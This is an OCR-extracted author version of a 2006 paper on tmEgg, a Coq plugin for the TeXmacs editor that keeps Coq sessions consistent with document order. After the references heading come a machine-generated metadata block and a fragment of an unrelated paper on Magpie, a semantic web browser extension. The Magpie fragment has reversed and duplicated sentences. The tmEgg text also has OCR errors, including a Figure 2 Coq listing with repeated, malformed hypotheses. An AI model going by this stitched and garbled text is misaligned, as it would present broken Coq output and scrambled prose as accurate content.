PDF hosted at the Radboud Repository of the Radboud University Nijmegen The following full text is an author’s version which may differ from the publisher’s version. For additional information about this publication click this link. http://hdl.handle.net/2066/36211 Please be advised that this information was generated on 2018-05-03 and may be subject to change. A Document-Oriented Coq Plugin for $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ Herman Geuvers Lionel Elie Mamane 10$^{\text{th}}$ August 2006 Abstract This article discusses the integration of the authoring of a mathematical document with the formalisation of the mathematics contained in that document. To achieve this we have started the development of a Coq plugin for the $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ scientific editor, called tmEgg. $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ allows the wysiwyg editing of mathematical documents, much in the style of $\text{L}_{\text{T}}\text{E}_{\text{X}}$. Our plugin allows to integrate into a $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ document mathematics formalised in the Coq proof assistant: formal definitions, lemmas and proofs. The plugin is still under development. Its main current hallmark is a document-consistent interaction model, instead of the calculator-like approach usual for $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ plugins. This means that the Coq code in the $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ document is interpreted as one (consistent) Coq file: executing a Coq command in the document means to execute it in the context (state) of all the Coq commands before it. 1 Introduction $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ ([vdH04]) is a tool for editing mathematical documents in a wysiwyg style. The input an author types is close to $\text{L}_{\text{T}}\text{E}_{\text{X}}$, but the output is rendered directly on screen in a pretty-printed way. $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ supports structured editing and it stores the files in a structured way using tags, which is close to XML. So, a $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ document is a labelled tree. The labels (tags) provide information that can be used as content or display information. For a specific label, the user can choose a specific way of rendering the subtrees under a node with that label, for example rendering all subtrees in math mode. But a user may also choose a specific action for the subtrees, for example sending the subtrees as commands to the computer algebra package Maple. Of course, many labels are predefined, like in $\text{L}_{\text{T}}\text{E}_{\text{X}}$, so a user is not starting from scratch. $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ facilitates interaction with other applications in an easy way: within $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ one can open a “session”, for example a Maple session, and then input text within that session is sent to a Maple process that is running in the background. The Maple output is input to the $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ document in a structured way, and rendered accordingly. In this way, $\text{T}_{\text{E}}\text{X}_{\text{MACS}}$ can be used as an interface for Maple, with the additional possibility to add text or mathematical formulas around the Maple session, creating a partially interactive mathematical document. Here the interaction lies in the possibility to execute parts of the document in the background application. In this paper we present tmEgg, a Coq plugin for TeXMac\textsc{s}. The plugin allows the user to call Coq from within a TeXMac\textsc{s} document, yielding a TeXMac\textsc{s} document interleaved with Coq sessions. It also provides special commands for Coq, like stating a definition or a lemma. The plugin does not provide its own proof language, but leverages any proof language that Coq understands or will understand in the future, such as [Cor06]. This means that when doing a proof, the user types actual Coq commands (usually tactics) in the TeXMac\textsc{s} document, which are then sent to Coq as-is and the Coq output is rendered by TeXMac\textsc{s}. This is in contrast with the approach of e.g. [The03], [DF05] or [ALW06], that seek to change the way a proof is written or the way a user interface interacts with the prover (relegated to a “backend” role) in a much more fundamental way. A crucial aspect of the plugin is that it views the sequence of Coq sessions within a document as one Coq file. So, when one opens a document and executes a command within a Coq session, first all previous Coq commands (possibly in previous Coq sessions) are executed and the present command is then executed in the Coq state thus obtained. So the TeXMac\textsc{s} document as a whole also constitutes a valid Coq development. Additionally, one can backtrack to a command within a previous session, jumping to the Coq state at that point of the development. From the Coq perspective, one can thus see the TeXMac\textsc{s} document as a documentation of the underlying Coq file. Using TeXMac\textsc{s}, one adds pretty printed versions of the definitions and lemmas. The plugin further supports this by a folding (hiding) mechanism: a lemma statement has a folded version, showing only the pretty printed (standard mathematical) statement of the lemma, and an unfolded version, showing also the Coq statement of the lemma. A further unfolding also shows the Coq proof of the lemma. Altogether there are four ways of seeing the tmEgg TeXMac\textsc{s} plugin. These are not disjoint or orthogonal, but it is good to distinguish them and to consider the various requirements that they impose upon our plugin. A Coq interface. One can call Coq from within TeXMac\textsc{s}; thus providing an interface to Coq. When the user presses the return key in a Coq interaction field, the Coq commands in this field are sent to Coq and Coq returns the result to TeXMac\textsc{s}. The plugin doesn’t do any pretty printing of Coq output (yet), but it allows to save a Coq development as a TeXMac\textsc{s} file which can be replayed. Purely as an interface the plugin does about the same as Proof General ([Asp00]) or CoqIde ([Teab]). A documented Coq formalisation. A Coq formalisation usually has explanatory comments to give intuitions of the definitions, lemmas and proofs or to give a mathematical (e.g. in TeX) explanation of the formal Coq code. The plugin can be used for doing just that: the traditional TeXMac\textsc{s} elements are used for commenting the underlying Coq file. In this respect, tmEgg can play the same role as Coqdoc ([Teab]), but also more. Coqdoc extracts document snippets (in HTML or TeX format) from specially formatted comments in Coq scripts (.v files), and creates a HTML or TeX document containing these snippets and the vernacular statements (or only gallina, that is the statements without proofs) verbatim, along with some basic pretty-printing of terms. Where the use of Coqdoc restricts the user to choosing between having the explanatory comments rendered (as a HTML or TeX document) and interacting with Coq (in the “source” .v file), tmEgg enables the user to have both at the same time, while keeping the property that the document can be read without Coq, and exported to a format that can be read without \texttt{\LaTeX} (but without Coq interaction), such as HTML, PostScript, PDF, ... Taking this use case to its extreme, one arrives at a notion of \textit{literate proving}, by analogy to literate programming. \textbf{A mathematical document with a Coq formalisation underneath.} One can write a mathematical article in \texttt{\LaTeX}, like one does in \texttt{\LaTeX}. Thus, one can take a mathematical article and extend it with formal statements and proofs. Due to the folding mechanism, the “view” of the article where everything is folded can be the original article one started with. It should be noted that, if one adds a Coq formalisation underneath this, not everything needs to be formalised: lemmas can be left unproven etc., as long as the Coq file is \textit{consistent}, i.e. no notions are used unless they are defined. In this sense, tmEgg makes a step in the direction of the Formal Proof Sketches idea of [Wie04]. \textbf{Mathematical course notes with formal definitions and proofs.} We can use the \texttt{\LaTeX} document for course notes (handouts made by the teacher for students). An added value of our plugin is that we have formal definitions and proofs underneath, but we don’t expect that to be a very appealing feature for students. On the other hand, we also have full access to Coq, so we can have exercises that are to be done with Coq, like “prove this statement” or “define this concept such that such and such property holds”. This is comparable in its intent to ActiveMath ([MAB+01]). In the following we present our plugin tmEgg, including some technical details and a fragment of a \texttt{\LaTeX} document with underlying Coq formalisation. We will discuss the four views on the plugin as mentioned above in detail. An essential difference between the tmEgg Coq plugin that we have created and other \texttt{\LaTeX} plugins, e.g. the one for Maple, is that we take a \textit{document oriented} approach. This we will describe first. \section{The document-consistent model} The \texttt{\LaTeX} plugins to computer algebra or proof systems usually obey a temporal model of interaction, that is that the expressions given to the plugin are evaluated in chronological order, irrespective of their relative position in the document. In other words, the \texttt{\LaTeX} plugin system ignores the fact that the interpreter it is interfacing with has an internal state which is modified by the commands \texttt{\LaTeX} gives it and influences the results of these commands. This can lead to the document showing results that are not consistent with the natural reading order of the document, if the expressions are not evaluated in the order in which they appear, something which crops up naturally when writing a document: One sometimes goes back to improve on a previous statement or definition. Furthermore, the results shown by the document may be irreproducible, as the sequence of statements leading up to the state in which the expressions were evaluated can be lost. See figure 1 for an example: The left part shows an example of inconsistent output with the CAS Axiom. The third (in reading order) command was executed before the second but after the first, leading to the evaluation of \texttt{a} resulting in 6, while reading the document from top to bottom would suggest it should be 5 at this point. The situation would be even worse if a := 6 were to be deleted; the reason for a evaluating to 6 is completely lost. Contrast with the right part, showing a tmEgg Coq session. Empty_set is predefined in Coq’s standard library, and gets redefined in the second command. However, whatever the order in which the user asks for evaluation of the commands, the result shown will always be the one in the figure. E.g. if the user asks for evaluation of the second command (defining Empty_set to be 5) and then asks for the evaluation of the first one, the first command will always answer “Empty_set is an inductively defined type of sort Set without any constructor”, not “Empty_set is 5”. ``` → a := 5 5 → a 6 ``` Figure 1: Example of inconsistent and consistent output This risk of inconsistency is naturally highly undesirable in the context of writing formal mathematics, leading to a document-consistent model of interaction: a statement is always evaluated in the context defined by evaluating all statements before it in the document, in document order, starting from a blank state. 2.1 Implementation Coq 8.1 thankfully provides basic framework support for this, in the form of a backtrack command that can restore the state to a past point B. It works under the condition that no structure (section, definition, lemma, ...) whose definition is currently finished was open (incomplete) at point B. If this condition is not satisfied, tmEgg backtracks up to a point before B where this condition does hold and then replays the statements between that point and B. The arguments given to the backtrack command are derived from state information that Coq gives after completion of each command, in the prompt. tmEgg stores the information on the Coq state before a command as a state marker next to the command itself, that is a document subtree whose rendering is the empty string. This state information consists (roughly speaking) of the number of definitions made in the current session, the list of open definitions and the number of steps made in the current open definition, if any. tmEgg also keeps track of the position in the document of the last command executed by Coq. This is used at Coq command execution time to determine whether a backtrack or a forward jump is necessary before the command can be evaluated. 3 Presentation of tmEgg tmEgg extends \textsf{T}_{\text{FMACX}} with Coq interaction fields. One can naturally freely interleave Coq interaction fields with usual document constructs, permitting one to interleave the formal mathematics in Coq and their presentation in \textsf{B}T\textsf{E}X level mathematics. Each Coq interaction can be folded away at the press of a button, as well as each specific result of a command individually. The output of the previous command is automatically folded upon evaluation of a command. See figure 2 for an example: The empty circles indicate a folded part and can be clicked to unfold that part, and the full circles indicate a foldable unfolded part and can be clicked to fold it. Here, the formal counterpart to hypothesis 2 is completely folded, while the statement of lemma 3 is unfolded and its proof folded. The proof of lemma 4 is unfolded, but the result of most of its steps is folded. 1 Nested Intervals We first give some general constructions and lemmas for nested intervals that will be used in the proof of the Intermediate Value Theorem later. - Variable $a, b : \mathbb{N} \rightarrow \mathbb{R}$ - Hypothesis 2. $a$ is increasing, i.e. $\forall i \in \mathbb{N}(a_i \leq a_{i+1})$; $b$ is decreasing i.e. $\forall i \in \mathbb{N}(b_i \geq b_{i+1})$; $a$ is below $b$, i.e. $\forall i \in \mathbb{N}(a_i < b_i)$; $a$ and $b$ get arbitrarily close, i.e. for every positive real number $\varepsilon$, there is an $i$ such that $b_i < a_i + \varepsilon$ - Lemma 3. $a$ is monotone, i.e. $\forall i, j \in \mathbb{N}(i \leq j \rightarrow a_i \leq a_j)$ Coq < \text{Lemma a\_mon': forall i, j : nat, i < j -> a i <= a j}. - Lemma 4. $b$ is monotone, i.e. $\forall i, j \in \mathbb{N}(i \leq j \rightarrow b_i \leq b_j)$ Coq < \text{Lemma b\_mon': forall i, j : nat, i < j -> b j <= b i}. - \text{b\_mon' < intro.} - \text{b\_mon' < set (b' := fun i : nat => [-] (b i)) in *}. 1 subgoal \begin{verbatim} a : nat -> IR b : nat -> IR a_mon : forall i : nat, a i <= a (S i) b_mon : forall i : nat, b i <= b (S i) a, b : forall i : nat, a i <= b i b_a : forall i : nat, a i <= b (S i) b_b : forall i : nat, b i <= b i a_b : forall i, j : nat, i < j a'_b : fun i, j : nat, i < j -> a i <= a j a'_b : fun i, j : nat, i < j -> a i <= a j a'_b : fun i, j : nat, i < j -> a i <= a j a'_b : fun i, j : nat, i < j -> a i <= a j b : nat -> IR b_mon' : forall i : nat, b i <= b (S i) b_mon' : forall i : nat, b i <= b (S i) b_mon' : forall i : nat, b i <= b (S i) b_mon' : forall i : nat, b i <= b (S i) b_mon' : forall i : nat, b i <= b (S i) \text{b_mon' < set (b' := fun i : nat => [-] (b i)) in *}. \end{verbatim} Figure 2: tmEgg screenshot Note that the result of each Coq command is inserted into the document stat- ically (and replaced upon reevaluation); this means that they can be copied and pasted like any part of the document, but also that the saved file contains them, so that the development can be followed without running Coq, a potentially lengthy operation. As a corollary, the development can even be followed (but not independently checked) on a computer lacking Coq. In order to help the user create the proposed “formal and informal version of the same mathematics” structure (particularly in the “mathematical document with a Coq formalisation underneath” scenario), we present him with a menu where he can choose a Coq statement type (such as Lemma, Hypothesis, Definition, ...) and that will create an empty template to fill made of: - the corresponding \texttt{TEXMACS} theorem-like environment for the informal statement; - a foldable Coq interaction field for the formal statement; - a foldable Coq interaction field for the body of the informal statement, if appropriate; This is illustrated in figure 3. ![Figure 3: New statement menu, empty lemma structure](image) 3.1 Architecture We have decided to try to minimise the changes to Coq itself for this project, and in particular to try not to put \texttt{TEXMACS} protocol or syntax specific code in Coq. That’s why, rather than adapt Coq to speak the \texttt{TEXMACS} plugin protocol by itself, we have implemented a wrapper in OCaml that translates from Coq to \texttt{TEXMACS} (see figure 4). We try to keep that wrapper as simple and stateless as possible, putting most of the intelligence of the plugin in Scheme in \texttt{TEXMACS}. 4 How well does the plugin do? In the introduction, we have described four views (possible applications) on the tmEgg plugin. We now want to discuss to which extent the plugin satisfies the requirements for each of those views. A Coq interface. One can do Coq from within a \texttt{TEXMACS} document using our plugin, but, compared to well-known interfaces like Proof General ([Asp00]) and CoqIDE ([Teab]), the plugin is in particular worse in terms of the display of the proof state: the proof state is displayed inside the document, which can clutter things up. From a purely user-interface-for-theorem-provers perspective, a reserved fixed-size area for displaying the proof state is sometimes better, in particular to contain the proof state when it grows unwieldy large. Other things that our plugin does not support but are possible to add in \texttt{TEXMacs} are: menus for special tactics and pretty printing (but Proof General and CoqIDE don’t have this either). Pretty printing is of course interesting to add in the context of \texttt{TEXMACS}, because it has various \LaTeX\-like facilities to add it. However, it should be noted that, if we want to use our plugin as an interface for Coq, the syntax should be accepted as input syntax, too, so as to not confuse the user. The user may also (occasionally or structurally) prefer to use the default Coq pure text syntax rather than mathematical graphical notations; this will always be supported. A documented Coq formalisation. As a documentation tool, the plugin works fine. One can easily add high level mathematical explanations. It would be convenient to be able to load a whole (annotated, e.g. in Coqdoc syntax) Coq file into \texttt{TEXMACS} and then continue further annotating it; we intend to write such an import tool in the future. Note however that there is no (formal) link between the formal Coq and the high level explanation in \texttt{TEXMACS}, because the high level translation is not a translation of the Coq code, but added by a human. This is different from, e.g. the work in the Mowgli ([AW02]) project, where we have a high level rendering of the formal Coq statements. A mathematical document with a Coq formalisation underneath. This is a way the plugin can be used now. One would probably want to hide even more details, so more folding would be desirable, e.g. folding a whole series of lemmas into one “main lemma” which is the conclusion of that series. Thus one would be able to create a more high level of abstraction that is usual in mathematical documents. Of course this can already be done in \texttt{TEXMACS}, but our plugin does not specifically propose it automatically. If such nested folding would be added, it would also be advisable to be able to display the “folding structure” separately, to give the high level structure of the document. Mathematical course notes with formal definitions and proofs. In general, proof assistants are tools that require quite some maturity to be used, so therefore we don’t expect students to easily make an exercise in their \texttt{TEXMACS}. course notes using the underlying proof assistant Coq, i.e. as an exercise in the mathematics studied rather than as an exercise in Coq. This situation may improve in the future though, depending on the maturity of proof as­ sistant technology. It should also be noted that the plugin does not (yet) explain/render the Coq formalised proofs, like e.g. the Helm tool ([APC+03]) does (by translating a formal proof into a mathematically readable proof). See also [AGL+F06]. 5 Future Outlooks 5.1 Mathematical input/output Current TeX\textsc{macs} interfaces to computer algebra systems include conversion to and from mathematical notations (see figure 5). Doing the same with Coq brings some difficulties in a more acute way than with a CAS: - Different developments will call for the same notation to map to different Coq objects; there are for example several different real numbers implementations for Coq. - Similarly, the best notation to use for the same Coq construct will vary de­ pending on the document, where in the document one is, or even more subtle factors. A prime example of this is parentheses around associative operators: One usually doesn’t want a full parenthesising in statements, but if one al­ ways leaves out “unnecessary” parentheses, the statement of the associativity lemma itself looks quite pointless, as do the proof steps consisting of applying the associativity lemma. - Some Coq constructs (such as some ways to define division) need information that is not part of usual mathematical notation (such as proof that the divisor is not zero). The notations will thus probably have to be highly dynamic; if making good choices automatically proves impossible, maybe a good compromise will be to let the author of the document choose on a case-by-case basis. Once at least the conversion to mathematical notation is satisfying, we can make a \texttt{\LaTeXMac}s command that takes a Coq term (or the name of one) and whose rendering is the “nice” mathematical rendering for that term. This means that users will be able to put Coq terms in their documents and have them look like \LaTeX-level mathematics. This conversion from and to “normal” mathematical notation might also form a usable mechanism for informal and unsafe exchange of terms between different computer algebra systems and proof assistants. E.g. if the Coq goal to prove is $x^{18} - 5x^7 + 5 = 0 \land x > 2$, the user could select in the goal the expression $x^{18} - 5x^7 + 5 = 0$ (duly converted from Coq term to mathematical notation by \texttt{tmEgg}), paste it into a CAS session and ask the CAS to solve that equation (where the \texttt{\LaTeXMac}s-CAS integration plugin will duly convert it to the syntax of the CAS being used) to quickly check whether the goal is provable, or use the CAS as an oracle to find the roots and use knowledge of the roots to make the proof easier to write. 5.2 Communication with Coq The wrapper currently interacts with Coq through the \texttt{coqtop -emacs} protocol, that is the human-oriented \texttt{coqtop} protocol\textsuperscript{1}, very slightly extended to be more convenient for programs. However, this protocol presents a few suboptimalities for our purposes: - There is no documented, robust, way to determine whether a command you gave failed, gave a warning or succeeded. (Naturally, the existing interfaces have organically grown rules about parsing Coq’s answer that will give usually succeed in this task.) - Terms are pretty-printed back to the original input syntax, which is non trivial to parse and interpret; it has some overloading and in particular relies on typing information. In order to implement the “mathematical notation input/output” with \texttt{\LaTeXMac}s, we would like to get the terms at a more low level, as trees. We thus plan to implement a good generic interface protocol for Coq, that will hopefully be able to serve the needs of several interfaces at once. We intend to revive and extend the protocol used by Centaur and PCoq ([Teaa]). Its main advantage is that it presents terms as trees, in an easily parsed reverse polish notation with explicit arity. Other interfaces (as well as \texttt{tmEgg}) will (sometimes or always) want to get the usual text pretty-printed format, so this terms-as-trees feature will be made optional. However, this protocol in its current state does not integrate the rather new backtracking feature; we will extend it so that it does. 5.3 Miscellaneous Once the basic framework of \texttt{tmEgg} has matured and works well, all kinds of small, but highly useful, features can be imagined: - Import of Coq files containing Coqdoc document snippets, leveraging the \texttt{\LaTeX} import of \texttt{\LaTeXMac}s. \footnote{A tutorial to Coq is available at \url{http://coq.inria.fr/doc/tutorial.html}.} • Automatic generation of table of Coq constructs in the document and corresponding index. • Similarly, menu command to jump to the definition of a particular Coq object. • Make any place where a Coq object (e.g. a lemma) is used a hyperlink to its definition. This could even eventually be expanded up to making tmEgg a Coq library browser. References
{"Source-Url": "http://repository.ubn.ru.nl/bitstream/handle/2066/36211/36211.pdf?sequence=1", "len_cl100k_base": 6297, "olmocr-version": "0.1.50", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 25451, "total-output-tokens": 7864, "length": "2e12", "weborganizer": {"__label__adult": 0.00033473968505859375, "__label__art_design": 0.0011949539184570312, "__label__crime_law": 0.0004274845123291016, "__label__education_jobs": 0.00801849365234375, "__label__entertainment": 0.00022304058074951172, "__label__fashion_beauty": 0.00022280216217041016, "__label__finance_business": 0.0004758834838867187, "__label__food_dining": 0.0005083084106445312, "__label__games": 0.0009331703186035156, "__label__hardware": 0.0010929107666015625, "__label__health": 0.0007791519165039062, "__label__history": 0.0004944801330566406, "__label__home_hobbies": 0.0002294778823852539, "__label__industrial": 0.0010366439819335938, "__label__literature": 0.0008969306945800781, "__label__politics": 0.0003871917724609375, "__label__religion": 0.0007524490356445312, "__label__science_tech": 0.452392578125, "__label__social_life": 0.0002560615539550781, "__label__software": 0.03875732421875, "__label__software_dev": 0.4892578125, "__label__sports_fitness": 0.0004167556762695313, "__label__transportation": 0.0005903244018554688, "__label__travel": 0.00023353099822998047}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28880, 0.02261]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28880, 0.34873]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28880, 0.86493]], "google_gemma-3-12b-it_contains_pii": [[0, 367, false], [367, 3484, null], [3484, 7174, null], [7174, 10590, null], [10590, 12927, null], [12927, 15835, null], [15835, 17442, null], [17442, 20532, null], [20532, 22346, null], [22346, 25381, null], [25381, 28026, null], [28026, 28880, null]], "google_gemma-3-12b-it_is_public_document": [[0, 367, true], [367, 3484, null], [3484, 7174, null], [7174, 10590, null], [10590, 12927, null], [12927, 15835, null], [15835, 17442, null], [17442, 20532, null], [20532, 22346, null], [22346, 25381, null], [25381, 28026, null], [28026, 28880, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28880, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28880, null]], "pdf_page_numbers": [[0, 367, 1], [367, 3484, 2], [3484, 7174, 3], [7174, 10590, 4], [10590, 12927, 5], [12927, 15835, 6], [15835, 17442, 7], [17442, 20532, 8], [20532, 22346, 9], [22346, 25381, 10], [25381, 28026, 11], [28026, 28880, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28880, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
d89063746233f7d68c03d3391fa25d36733eb518
Magpie: supporting browsing and navigating on the semantic web Conference Item For guidance on citations see FAQs. © 2004 Association for Computing Machinery Version: Accepted Manuscript Link(s) to article on publisher’s website: http://dx.doi.org/doi:10.1145/964442.964479 Copyright and Moral Rights for the articles on this site are retained by the individual authors and/or other copyright owners. For more information on Open Research Online’s data policy on reuse of materials please consult the policies page. oro.open.ac.uk ABSTRACT We describe several advanced functionalities of Magpie – a tool that assists users with interpreting the web resources. Magpie is an extension to the Internet Explorer that automatically creates a semantic layer for web pages using a user-selected ontology. Semantic layers are annotations of a web page, with a set of applicable semantic services attached to the annotated items. We argue that the ability to generate different semantic layers for a web resource is vital to support the interpretation of web pages. Moreover, the assignment of semantic web services to the entities allows users to browse their neighbourhood semantically. At the same time, the Magpie suite offers trigger functionality based on the patterns of an automatically updated semantic log. The benefits of such an approach are illustrated by a semantically enriched browsing history management. Categories and Subject Descriptors H.5.4 [Hypertext/Hypermedia]: Architecture, Navigation, User Issues – semantic web browsing, semantic services. General Terms Performance, Experimentation, Human Factors Keywords Semantic Web, browsing history management, semantic web services, named entity recognition 1 INTRODUCTION A lot of research has gone into supporting the task of finding web resources – by means of ‘standard’ information retrieval mechanisms or by means of semantically enhanced search [6, 13]. Less attention has been paid to the task of supporting the interpretation of web pages. Annotation technologies [8, 14] allow users to associate meta-data with web resources, which can then be used to facilitate their interpretation. The annotation technologies provide a useful way to support shared interpretation, but they are very limited; mainly because the annotation is carried out manually. Hence, the quality of meta-data depends on the authors or librarians annotating the web page. The majority of web pages are not semantically annotated. This is a great obstacle in a move towards the Semantic Web [1]. Magpie is a tool supporting the interpretation of web pages and acting as a complementary knowledge source, which a user can call upon to gain instantaneous access to the background knowledge relevant to a web resource. Magpie follows a different approach from that used by most other annotation techniques: it automatically associates a semantic layer to a web resource, rather than relying on a manual annotation. This ability relies on ontology [5] – an explicit, declarative representation of a discourse. Ontologies are the cornerstone of the emerging semantic web: they provide conceptual interoperability, allow agents to ‘understand’ information on the web and to collaborate with other semantically aware agents. Magpie uses ontologies to associate meaning with the information found on a web page. Based on the identified meanings, relevant services can be invoked, or value-added functionalities offered to the user. The association between an ontology and a web resource provides an interpretative viewpoint or context for the resource in question. Indeed the overwhelming majority of web pages are created within a specific context. Some readers of a web page might be very familiar with such a context, while others might not. In the latter case, Magpie is especially beneficial, given that the context is made explicit to the reader and context-specific functionalities are provided. One incentive for this kind of research was summed up by a seminal study of how users browse the web. Tauscher and Greenberg [16] presented the following statistics on the types of actions users carry out: - 58% of pages visited are revisits, - 90% of all user actions are related to navigation, - 30% of navigation actions use the ‘Back’ button, - less than 1% of navigation actions use a history mechanism A fairly obvious conclusion from these statistics is that web users need support in capturing what they have seen previously. Current browsing history and bookmark tools are not effective. Magpie can automatically track concepts found during a browsing session using a semantic log. The log allows trigger services to be activated when a specific pattern of concepts has been found. The same log can be used as a conceptual representation of the user’s browsing history. Since all Magpie abilities are underpinned by ontological reasoning, this enables the users to use the history semantically rather than as a purely linear and temporal record of their activities. MAGPIE USAGE SCENARIO Assume a journalist is writing an article on the Knowledge Media Institute (KMi) for a magazine. She needs to gather information about the key projects led by senior KMi staff. Using a web browser with a Magpie extension, she visits the home page of the lab’s director Enrico Motta. After loading it, she wants to quickly recognize interesting concepts denoting researchers, collaborating organizations, projects, and research areas in the page. These concepts draw on an existing ontology of academic organizations, which was populated by mining databases and web resources, and is available to the external users. Fig. 1 shows the journalist’s browser with the concepts of interest highlighted using the Magpie toolbar, which extends the functionality provided by Internet Explorer. As can be seen, Magpie preserves structure of the page, and highlights the concepts upon user’s request. This approach reduces the confusion, which may occur when the content and/or appearance of a web page are altered. The Magpie toolbar (see marker ‘*’ in Fig. 1) allows users to toggle highlighting of the specific class of entities, which were annotated using an ontology-derived lexicon. The classes are ontology dependent – changing the ontology generates new toolbar buttons. As ontology represents an interpretative viewpoint we leave the choice of ontology to the user. On the right-hand side of Fig. 1 are three Magpie collectors. These are automatically filled by Magpie trigger services as the user browses. During a browsing session, the entities found on accessed web pages are asserted into a semantic log knowledge base (KB). Collectors show a semantically filtered view of the semantic log. For instance, the top two collectors in Fig. 1 show the people and projects that were recognized on any page visited during the current browsing session. The bottom collector shows the projects associated with any people recognized during the browsing session, which were not mentioned explicitly in any page but are known in the domain ontology. Fig. 1 shows a number of projects the four researchers from the top-right collector are associated with. One of the highlighted concepts that have semantic meaning in a given ontology is ‘ScholOnto’. A right-click on the ‘ScholOnto’ term invokes a semantic services menu as shown in Fig. 1. The menu options depend on the class of the selected entity within a particular ontology. In our case, ‘ScholOnto’ is a Project, so project-related options are displayed. The user selected the ‘Shares Research Areas With’ service, results of which form a list of related items and are shown in Fig. 2. Some of the concepts listed in Fig. 2 are not explicitly present in Fig. 1. In other words, the journalist now takes advantage of using the context in which a particular page was written. This allows her to browse orthogonally to the syntactic, author-defined links using implicit relationships among different concepts known in a particular ontology. MAGPIE ARCHITECTURE The overall goal of this project is to support interpretation of web documents with no a-priori mark-up by means of adding an ontology-derived semantic layer. The main design principles to emphasize are: the ability to extend a standard web browser, preservation of web page appearance, and separation of content and semantic annotation. The full list of principles underlying the design of Magpie is discussed in [4]. the purposes of this paper, it is sufficient to highlight the key paper. They are discussed in detail in earlier publication [4]. For Details both conceptual and technical of the different components a semantic log KB, a feature discussed in detail further in the pa- ables us to abstract from their implementation. Some services use are semantically annotated to the ontological classes, which en- so that they interpret the same concept in the same way. Services The ontological representations are shared by different services, related KBs, semantic services and a semantic log KB. library of knowledge models containing domain ontologies, popu- tral service provider is built around a suite of tools accessing a vice and many different services [15]. Currently, the Magpie cen- services paradigm there may be many providers of the same ser- by a web browser and an ontology-based server. In line with web The web services terminology emphasizes multiple roles played function between the user and the semantically enriched browser. The user’s web browser, and is responsible for managing the interac- tion between the user and the semantically enriched browser. The toolbar is a graphical user interface (GUI) to the underlying func- tionality. The web browser plug-in is built around a fast named entity recognition (NER) engine that recognizes and highlights response to user pressing a particular button on the Magpie tool- bar. Simultaneously with the annotation, the recognized entities are passed on to the semantic log KB, where they are recorded and used by appropriate trigger services. 4 SEMANTIC SERVICES IN MAGPIE In the previous section we briefly described how a semantic layer is created, displayed and activated. The main benefits of using Magpie however are generated from the ability to deploy semantic services on top of the semantic layer. These services are provided to the user as a physically independent layer over a particular HTML document. Magpie distinguishes between two types of semantic services, each having a specific user interaction model: on-demand and trigger services. 4.1 On-demand semantic services Once the semantic entities on a web page are annotated, the contextual (right-click) menu of a web browser is overridden by an on-demand services menu whenever the mouse hovers over a rec- ognized entity. The ‘on-demand services’ menu is also context- dependent as could be expected; however, in this case, it is a se- mic context defined by the membership of a particular entity to a particular ontological class. The information on class membership is contained in the ontology or a lexicon generated from on- tology. One specific ontology on our ontology server formally defines what services can be attached to particular classes, and the semantics of their operations. The semantic services are defined and published in line with standards of the emerging web services technology [15]. In our scenario of Magpie serving as a semantic portal for organizational research, the services were defined for the individual ontological classes on the ontology server without any brokering. An example of a service for class Project is shown as a semantic menu displayed in the center of Fig. 1. Similarly to parsing and annotation done by the plug-in automatically, the ‘on-demand services’ menu is also generated on the fly. Selecting an option in semantic services menu generates a request to the Magpie dispatcher to contact the appropriate service pro- vider and perform the requested reasoning. The knowledge-level reasoning facilitated by the service provider provides context for a particular entity. This is delivered back to the web browser to be annotated and displayed. An example of a response is visible as a new browser window in the foreground of Fig. 2. Hence, the Magpie plug-in in co-operation with the standard browser functionality facilitates two complementary methods of web browsing. First, syntactic browsing using the <A HREF=...> anchors inserted into a document by its author. The second browsing method uses the customized semantic anchors created during sources (e.g. databases). The heuristics include e.g. recognition of abbreviations or people’s initials. The specific rules applicable to our scenario from the previous section use the AKT reference ontology. Instead of adding more complex NER techniques to the plug-in, we are experimenting with implementing the advanced NER algorithms as (semantic web) services available upon a user’s request. This leaves the actual plug-in thin and fast. When an entity of interest is recognized in the web page, the plug- in annotates it with customized <SPAN...> tags, and links it with a relevant ontological instance/class within the chosen ontology. This process creates a semantic layer over the original document, original content of which remains untouched. The interesting concepts and the corresponding text on the page are highlighted in response to user pressing a particular button on the Magpie tool- bar. Simultaneously with the annotation, the recognized entities are passed on to the semantic log KB, where they are recorded and used by appropriate trigger services. 3.1 Magpie browser extension – IE plug-in Magpie Browser Extension (further plug-in) is embedded in the user’s web browser, and is responsible for managing the interac- tion between the user and the semantically enriched browser. The toolbar is a graphical user interface (GUI) to the underlying func- tionality. The web browser plug-in is built around a fast named entity recognition (NER) engine that recognizes and highlights ontological entities. Our NER engine uses an 